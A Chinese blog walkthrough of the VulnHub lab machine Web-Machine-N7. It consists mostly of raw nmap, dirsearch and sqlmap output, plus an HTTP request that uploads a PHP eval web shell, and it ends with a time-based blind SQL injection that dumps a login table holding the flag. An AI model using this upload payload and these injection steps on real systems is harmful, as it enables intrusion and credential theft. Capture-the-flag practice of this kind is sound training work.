Web-Machine-N7

已于 2022-03-20 22:17:22 修改
阅读量1.8k 收藏
点赞数 2
分类专栏: 笔记 文章标签: web安全
于 2022-03-20 22:16:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Forever_Han13/article/details/123623188
版权 
$ sudo nmap -sP 192.168.0.1/24  

Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-21 04:31 CST
Nmap scan report for 192.168.0.1
Host is up (0.00048s latency).
MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)
Nmap scan report for 192.168.0.101
Host is up (0.18s latency).
MAC Address: DA:3F:DF:36:C2:F8 (Unknown)
Nmap scan report for 192.168.0.102
Host is up (0.19s latency).
MAC Address: D2:66:41:4A:73:EF (Unknown)
Nmap scan report for 192.168.0.103
Host is up (0.19s latency).
MAC Address: 7A:7D:03:A2:2C:73 (Unknown)
Nmap scan report for 192.168.0.105
Host is up (0.19s latency).
MAC Address: C8:94:02:0F:E5:33 (Chongqing Fugui Electronics)
Nmap scan report for 192.168.0.106
Host is up (0.18s latency).
MAC Address: 2A:86:BB:96:BD:6C (Unknown)
Nmap scan report for 192.168.0.107
Host is up (0.00013s latency).
MAC Address: 08:00:27:ED:BD:C7 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.0.109
Host is up (0.00066s latency).
MAC Address: E8:6A:64:83:2C:C0 (Lcfc(hefei) Electronics Technology)
Nmap scan report for 192.168.0.104
Host is up.
Nmap done: 256 IP addresses (9 hosts up) scanned in 2.93 seconds

$ sudo nmap -sV -sC -A 192.168.0.107

Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-21 04:32 CST
Nmap scan report for 192.168.0.107
Host is up (0.00024s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.46 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.46 (Debian)
MAC Address: 08:00:27:ED:BD:C7 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.24 ms 192.168.0.107

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.94 seconds

$ ./dirsearch.py -u 192.168.0.107


  _|. _ _  _  _  _ _|_    v0.4.2.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11305

Output File: /home/joker/softwares/dirsearch/reports/192.168.0.107_22-03-21_04-45-34.txt

Target: http://192.168.0.107/

[04:45:34] Starting: 
[04:45:35] 403 -  278B  - /.ht_wsr.txt
[04:45:35] 403 -  278B  - /.htaccess.bak1
[04:45:35] 403 -  278B  - /.htaccess.save
[04:45:35] 403 -  278B  - /.htaccess.sample
[04:45:35] 403 -  278B  - /.htaccess.orig
[04:45:35] 403 -  278B  - /.htaccessBAK
[04:45:35] 403 -  278B  - /.htaccessOLD
[04:45:35] 403 -  278B  - /.htaccessOLD2
[04:45:35] 403 -  278B  - /.htaccess_extra
[04:45:35] 403 -  278B  - /.htaccess_orig
[04:45:35] 403 -  278B  - /.htaccess_sc
[04:45:35] 403 -  278B  - /.htm
[04:45:35] 403 -  278B  - /.html
[04:45:35] 403 -  278B  - /.htpasswd_test
[04:45:35] 403 -  278B  - /.htpasswds
[04:45:35] 403 -  278B  - /.httr-oauth
[04:45:36] 403 -  278B  - /.php
[04:45:47] 200 -    2KB - /index.html
[04:45:48] 301 -  319B  - /javascript  ->  http://192.168.0.107/javascript/
[04:45:53] 200 -    1KB - /profile.php
[04:45:54] 403 -  278B  - /server-status
[04:45:54] 403 -  278B  - /server-status/

Task Completed


$ python3 dirsearch.py -e php,txt,zip,html -u 192.168.0.107 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40 -f .html --exclude-status 403,401


  _|. _ _  _  _  _ _|_    v0.4.2.3
 (_||| _) (/_(_|| (_| )

Extensions: php, txt, zip, html | HTTP method: GET | Threads: 40 | Wordlist size: 1323275

Output File: /home/joker/softwares/dirsearch/reports/192.168.0.107_22-03-20_21-10-10.txt

Target: http://192.168.0.107/

[21:10:10] Starting: 
[21:10:10] 200 -    2KB - //
[21:10:10] 200 -    1KB - /profile.php
[21:10:11] 200 -    2KB - /index.html
[21:10:18] 301 -  319B  - /javascript  ->  http://192.168.0.107/javascript/
[21:11:03] 200 -  279B  - /exploit.html

POST /profile.php HTTP/1.1
Host: 192.168.0.107
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------390266645724629296494056176300
Content-Length: 258
Origin: http://192.168.0.107
Connection: close
Referer: http://192.168.0.107/exploit.html
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

-----------------------------390266645724629296494056176300
Content-Disposition: form-data; name="file"; filename="2.php"
Content-Type: application/x-php

<?php @eval($_POST['hacker']); ?>

-----------------------------390266645724629296494056176300--

$ sqlmap -u "http://192.168.0.107/enter_network/" --forms  --dbs --current-db

        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.6.3#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:57:49 /2022-03-20/

[21:57:49] [INFO] testing connection to the target URL
[21:57:49] [INFO] searching for forms
[1/1] Form:
POST http://192.168.0.107/enter_network/
POST data: user=&pass=&sub=SEND
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: user=&pass=&sub=SEND] (Warning: blank fields detected): 
do you want to fill blank fields with random values? [Y/n] Y
[21:57:55] [INFO] resuming back-end DBMS 'mysql' 
[21:57:55] [INFO] using '/home/joker/.local/share/sqlmap/output/results-03202022_0957pm.csv' as the CSV results file in multiple targets mode
you have not declared cookie(s), while server wants to set its own ('role=MjEyMzJmMjk...FmYzM%253D;user=JGFyZ29uMmk...8rdGVZNWxv'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: pass (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=jLFz&pass=' AND (SELECT 3738 FROM (SELECT(SLEEP(5)))tzDH) AND 'UBOy'='UBOy&sub=SEND

Parameter: user (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=jLFz' AND (SELECT 6782 FROM (SELECT(SLEEP(5)))iLpP) AND 'hhga'='hhga&pass=&sub=SEND
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: user, type: Single quoted string (default)
[1] place: POST, parameter: pass, type: Single quoted string
[q] Quit
> 0
y
[21:58:07] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.46
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[21:58:07] [INFO] fetching current database
[21:58:07] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)                                                                                                                                                                                               
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[21:58:20] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
[21:58:31] [INFO] adjusting time delay to 1 second due to good response times
Machine
current database: 'Machine'
[21:58:54] [INFO] fetching database names
[21:58:54] [INFO] fetching number of databases
[21:58:54] [INFO] resumed: 4
[21:58:54] [INFO] resumed: information_schema
[21:58:54] [INFO] resumed: Machine
[21:58:54] [INFO] resumed: mysql
[21:58:54] [INFO] resuming partial value: performa
[21:58:54] [INFO] retrieved: nce_schema
available databases [4]:
[*] information_schema
[*] Machine
[*] mysql
[*] performance_schema

[21:59:38] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/joker/.local/share/sqlmap/output/results-03202022_0957pm.csv'

[*] ending @ 21:59:38 /2022-03-20/

$ sqlmap -u "http://192.168.0.107/enter_network/" --forms  --dbms=MySQL --random-agent -flush-session  --leve=1 --risk=3 --batch -D "Machine" --tables

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.6.3#stable}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:02:31 /2022-03-20/

[22:02:31] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[22:02:31] [INFO] testing connection to the target URL
[22:02:31] [INFO] searching for forms
[1/1] Form:
POST http://192.168.0.107/enter_network/
POST data: user=&pass=&sub=SEND
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: user=&pass=&sub=SEND] (Warning: blank fields detected): user=&pass=&sub=SEND
do you want to fill blank fields with random values? [Y/n] Y
[22:02:32] [INFO] flushing session file
[22:02:32] [INFO] using '/home/joker/.local/share/sqlmap/output/results-03202022_1002pm.csv' as the CSV results file in multiple targets mode
you have not declared cookie(s), while server wants to set its own ('role=MjEyMzJmMjk...FmYzM%253D;user=JGFyZ29uMmk...NkS2x1VEVn'). Do you want to use those [Y/n] Y
[22:02:32] [INFO] checking if the target is protected by some kind of WAF/IPS
[22:02:32] [INFO] testing if the target URL content is stable
[22:02:32] [INFO] target URL content is stable
[22:02:32] [INFO] testing if POST parameter 'user' is dynamic
[22:02:32] [WARNING] POST parameter 'user' does not appear to be dynamic
[22:02:33] [WARNING] heuristic (basic) test shows that POST parameter 'user' might not be injectable
[22:02:33] [INFO] testing for SQL injection on POST parameter 'user'
[22:02:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:02:34] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[22:02:35] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[22:02:35] [INFO] testing 'Generic inline queries'
[22:02:36] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:02:36] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:02:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[22:02:48] [INFO] POST parameter 'user' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) value? [Y/n] Y
[22:02:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:02:48] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:02:51] [INFO] checking if the injection point on POST parameter 'user' is a false positive
POST parameter 'user' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 61 HTTP(s) requests:
---
Parameter: user (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=KHfL' AND (SELECT 9320 FROM (SELECT(SLEEP(5)))HGJG) AND 'eYED'='eYED&pass=&sub=SEND
---
do you want to exploit this SQL injection? [Y/n] Y
[22:03:07] [INFO] the back-end DBMS is MySQL
[22:03:07] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
web server operating system: Linux Debian
web application technology: Apache 2.4.46
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[22:03:12] [INFO] fetching tables for database: 'Machine'
[22:03:12] [INFO] fetching number of tables for database 'Machine'
[22:03:12] [INFO] retrieved: 1
[22:03:19] [INFO] retrieved: 
[22:03:24] [INFO] adjusting time delay to 1 second due to good response times
login
Database: Machine
[1 table]
+-------+
| login |
+-------+

[22:03:47] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/joker/.local/share/sqlmap/output/results-03202022_1002pm.csv'

[*] ending @ 22:03:47 /2022-03-20/

$ sqlmap -u "http://192.168.0.107/enter_network/" --forms  --dbms=MySQL --random-agent -flush-session  --leve=1 --risk=3 --batch -D "Machine" -T login --tables

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.6.3#stable}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:04:22 /2022-03-20/

[22:04:22] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.33 (KHTML, like Gecko) Ubuntu/9.10 Chromium/13.0.752.0 Chrome/13.0.752.0 Safari/534.33' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[22:04:22] [INFO] testing connection to the target URL
[22:04:22] [INFO] searching for forms
[1/1] Form:
POST http://192.168.0.107/enter_network/
POST data: user=&pass=&sub=SEND
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: user=&pass=&sub=SEND] (Warning: blank fields detected): user=&pass=&sub=SEND
do you want to fill blank fields with random values? [Y/n] Y
[22:04:23] [INFO] flushing session file
[22:04:23] [INFO] using '/home/joker/.local/share/sqlmap/output/results-03202022_1004pm.csv' as the CSV results file in multiple targets mode
you have not declared cookie(s), while server wants to set its own ('role=MjEyMzJmMjk...FmYzM%253D;user=JGFyZ29uMmk...N3a25oT0xz'). Do you want to use those [Y/n] Y
[22:04:23] [INFO] checking if the target is protected by some kind of WAF/IPS
[22:04:23] [INFO] testing if the target URL content is stable
[22:04:23] [INFO] target URL content is stable
[22:04:23] [INFO] testing if POST parameter 'user' is dynamic
[22:04:23] [WARNING] POST parameter 'user' does not appear to be dynamic
[22:04:24] [WARNING] heuristic (basic) test shows that POST parameter 'user' might not be injectable
[22:04:24] [INFO] testing for SQL injection on POST parameter 'user'
[22:04:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:04:25] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[22:04:26] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[22:04:26] [INFO] testing 'Generic inline queries'
[22:04:27] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:04:27] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:04:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[22:04:39] [INFO] POST parameter 'user' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) value? [Y/n] Y
[22:04:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:04:39] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:04:42] [INFO] checking if the injection point on POST parameter 'user' is a false positive
POST parameter 'user' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 61 HTTP(s) requests:
---
Parameter: user (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=UyDc' AND (SELECT 1506 FROM (SELECT(SLEEP(5)))RzSr) AND 'CyXL'='CyXL&pass=&sub=SEND
---
do you want to exploit this SQL injection? [Y/n] Y
[22:04:58] [INFO] the back-end DBMS is MySQL
[22:04:58] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
web server operating system: Linux Debian
web application technology: Apache 2.4.46
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[22:05:04] [INFO] fetching tables for database: 'Machine'
[22:05:04] [INFO] fetching number of tables for database 'Machine'
[22:05:04] [INFO] retrieved: 1
[22:05:10] [INFO] retrieved: 
[22:05:15] [INFO] adjusting time delay to 1 second due to good response times
logi^C
[22:05:35] [WARNING] user aborted in multiple target mode
do you want to skip to the next target in list? [Y/n/q] Y
[22:05:35] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/joker/.local/share/sqlmap/output/results-03202022_1004pm.csv'

[*] ending @ 22:05:35 /2022-03-20/

$ sqlmap -u "http://192.168.0.107/enter_network/" --forms  --dbms=MySQL --random-agent -flush-session  --leve=1 --risk=3 --batch -D "Machine" -T "login" --columns

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.6.3#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:05:48 /2022-03-20/

[22:05:48] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050513 Firefox/1.0.4' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[22:05:48] [INFO] testing connection to the target URL
[22:05:48] [INFO] searching for forms
[1/1] Form:
POST http://192.168.0.107/enter_network/
POST data: user=&pass=&sub=SEND
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: user=&pass=&sub=SEND] (Warning: blank fields detected): user=&pass=&sub=SEND
do you want to fill blank fields with random values? [Y/n] Y
[22:05:48] [INFO] flushing session file
[22:05:48] [INFO] using '/home/joker/.local/share/sqlmap/output/results-03202022_1005pm.csv' as the CSV results file in multiple targets mode
you have not declared cookie(s), while server wants to set its own ('role=MjEyMzJmMjk...FmYzM%253D;user=JGFyZ29uMmk...hINklKVitV'). Do you want to use those [Y/n] Y
[22:05:48] [INFO] checking if the target is protected by some kind of WAF/IPS
[22:05:48] [INFO] testing if the target URL content is stable
[22:05:49] [INFO] target URL content is stable
[22:05:49] [INFO] testing if POST parameter 'user' is dynamic
[22:05:49] [WARNING] POST parameter 'user' does not appear to be dynamic
[22:05:49] [WARNING] heuristic (basic) test shows that POST parameter 'user' might not be injectable
[22:05:49] [INFO] testing for SQL injection on POST parameter 'user'
[22:05:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:05:50] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[22:05:52] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[22:05:52] [INFO] testing 'Generic inline queries'
[22:05:52] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:05:53] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:05:53] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[22:06:04] [INFO] POST parameter 'user' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) value? [Y/n] Y
[22:06:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:06:04] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:06:08] [INFO] checking if the injection point on POST parameter 'user' is a false positive
POST parameter 'user' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 61 HTTP(s) requests:
---
Parameter: user (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=kPuP' AND (SELECT 7577 FROM (SELECT(SLEEP(5)))rlbg) AND 'nKIr'='nKIr&pass=&sub=SEND
---
do you want to exploit this SQL injection? [Y/n] Y
[22:06:24] [INFO] the back-end DBMS is MySQL
[22:06:24] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
web server operating system: Linux Debian
web application technology: Apache 2.4.46
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[22:06:29] [INFO] fetching columns for table 'login' in database 'Machine'
[22:06:29] [INFO] retrieved: 
[22:06:39] [INFO] adjusting time delay to 1 second due to good response times
3
[22:06:41] [INFO] retrieved: username
[22:07:13] [INFO] retrieved: varchar(20)
[22:08:00] [INFO] retrieved: password
[22:08:36] [INFO] retrieved: varchar(50)
[22:09:23] [INFO] retrieved: role
[22:09:43] [INFO] retrieved: varchar(20)
Database: Machine
Table: login
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(50) |
| role     | varchar(20) |
| username | varchar(20) |
+----------+-------------+

[22:10:30] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/joker/.local/share/sqlmap/output/results-03202022_1005pm.csv'

[*] ending @ 22:10:30 /2022-03-20/

$ sqlmap -u "http://192.168.0.107/enter_network/" --forms  --dbms=MySQL --random-agent -flush-session  --leve=1 --risk=3 --batch -D "Machine" -T "login" -C "password,role,username" --dump

        ___
       __H__
 ___ ___["]_____ ___ ___  {1.6.3#stable}
|_ -| . [']     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:11:12 /2022-03-20/

[22:11:12] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.8.0.6) Gecko/20060728 SUSE/1.5.0.6-1.3 Firefox/1.5.0.6' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[22:11:12] [INFO] testing connection to the target URL
[22:11:12] [INFO] searching for forms
[1/1] Form:
POST http://192.168.0.107/enter_network/
POST data: user=&pass=&sub=SEND
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: user=&pass=&sub=SEND] (Warning: blank fields detected): user=&pass=&sub=SEND
do you want to fill blank fields with random values? [Y/n] Y
[22:11:13] [INFO] flushing session file
[22:11:13] [INFO] using '/home/joker/.local/share/sqlmap/output/results-03202022_1011pm.csv' as the CSV results file in multiple targets mode
you have not declared cookie(s), while server wants to set its own ('role=MjEyMzJmMjk...FmYzM%253D;user=JGFyZ29uMmk...Z6Wi9pbDU4'). Do you want to use those [Y/n] Y
[22:11:13] [INFO] checking if the target is protected by some kind of WAF/IPS
[22:11:13] [INFO] testing if the target URL content is stable
[22:11:13] [INFO] target URL content is stable
[22:11:13] [INFO] testing if POST parameter 'user' is dynamic
[22:11:13] [WARNING] POST parameter 'user' does not appear to be dynamic
[22:11:14] [WARNING] heuristic (basic) test shows that POST parameter 'user' might not be injectable
[22:11:14] [INFO] testing for SQL injection on POST parameter 'user'
[22:11:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:11:15] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[22:11:16] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[22:11:16] [INFO] testing 'Generic inline queries'
[22:11:17] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:11:17] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:11:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[22:11:29] [INFO] POST parameter 'user' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) value? [Y/n] Y
[22:11:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:11:29] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:11:32] [INFO] checking if the injection point on POST parameter 'user' is a false positive
POST parameter 'user' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 61 HTTP(s) requests:
---
Parameter: user (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=ycLE' AND (SELECT 6755 FROM (SELECT(SLEEP(5)))aeWE) AND 'tLVd'='tLVd&pass=&sub=SEND
---
do you want to exploit this SQL injection? [Y/n] Y
[22:11:48] [INFO] the back-end DBMS is MySQL
[22:11:48] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
web server operating system: Linux Debian
web application technology: Apache 2.4.46
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[22:11:53] [INFO] fetching entries of column(s) 'password,role,username' for table 'login' in database 'Machine'
[22:11:53] [INFO] fetching number of column(s) 'password,role,username' entries for table 'login' in database 'Machine'
[22:11:53] [INFO] retrieved: 1
[22:12:00] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)                                                                                                                                                                                      
[22:12:09] [INFO] adjusting time delay to 1 second due to good response times
FLAG{N7:KSA_01}
[22:13:20] [INFO] retrieved: admin
[22:13:41] [INFO] retrieved: administrator
Database: Machine
Table: login
[1 entry]
+-----------------+-------+---------------+
| password        | role  | username      |
+-----------------+-------+---------------+
| FLAG{N7:KSA_01} | admin | administrator |
+-----------------+-------+---------------+

[22:14:34] [INFO] table 'Machine.login' dumped to CSV file '/home/joker/.local/share/sqlmap/output/192.168.0.107/dump/Machine/login.csv'
[22:14:34] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/joker/.local/share/sqlmap/output/results-03202022_1011pm.csv'

[*] ending @ 22:14:34 /2022-03-20/
N1etzsche
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Vulnhub——WEB MACHINE:(N7)
weixin_46038704的博客
05-30 1056
这里写自asd 定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使
Vending-Machine-Web-App
05-02
该项目的目的是展示熟练使用HTML,CSS,JavaScript和jQuery为现有Web服务创建基于浏览器的用户界面的能力。 您将通过构建一个页面来展示您使用这些技能的能力,该页面允许用户通过提供的自动售货机REST API与虚拟...
Vulnhub之Web-Machine-N7
lm19770429的专栏
02-12 3967
靶机下载地址: Web Machine: (N7) ~ VulnHubWeb Machine: (N7), made by Duty Mastr. Download & walkthrough links are available.https://www.vulnhub.com/entry/web-machine-n7,756/Difficulty: Medium 常规做法: arp-scan -I eth0 -l :本地局域网IP地址扫描,个人感觉比nmap -sn 快 nmap -A
Vulnhub项目:Web Machine(N7)
Ays.Ie的博客
03-21 555
该篇记录了vulhub系列:Web Machine(N7)靶机的渗透过程
vulnhub靶场2:Web machine(N7)
Genarior的专栏
03-13 349
vulnhub靶场2:Webmachine(N7)
VulnHub | Web_Machine-N7
snowlyzz的博客
09-27 797
内网渗透,这题不值得一做
docker-machine-prompt.bash
06-03
docker-machine
docker-machine-wrapper.bash
06-03
docker-machine
docker-machine.7z
09-13
v.0.16.0 docker-machine 组件文件
docker-machine-Linux-x86_64
09-12
docker-machine 服务器上下一值失败 直接拷到服务器上 改名就能...mv docker-machine-Linux-x86_64 /tmp/docker-machine chmod +x /tmp/docker-machine && sudo cp /tmp/docker-machine /usr/local/bin/docker-machine
创建webmachine应用程序
03-27
NULL 博文链接:https://yuhaitao6688.iteye.com/blog/1187573
刷机教程n7
12-25
刷机教程
【Vulnhub靶场】Web Machine: (N7)
Nailaoyyds的博客
06-17 2144
确认靶机IP指定网卡扫描局域网 arp-scan -I eth1 -l 访问靶机,寻找功能点 localhost更改为靶机地址flag前半段直接出来了上传路径找不到了,没办法利用一句话木马。发现可疑的字符 base64>MD5 enter_network/admin.php #这个路径我的字典里没有,看其他师傅的博客才知道,没找到这个字典。role=admin......
关于webmachine
好记性不如烂博客
08-03 423
haogongju、人人IT网、59n南龙、360doc不要抄我的烂博客了,私人备忘用。 基于mochiweb,REST风格的erlang Web容器。流程图见docs目录下的http-headers-status-v3.png。 它适合构建符合REST风格的面向资源的web应用,不适合那种需要HTTP长连接的应用(例如websocket,这也和webmachine基于的web服务器m...
打靶分享:WEB MACHINE: (N7)
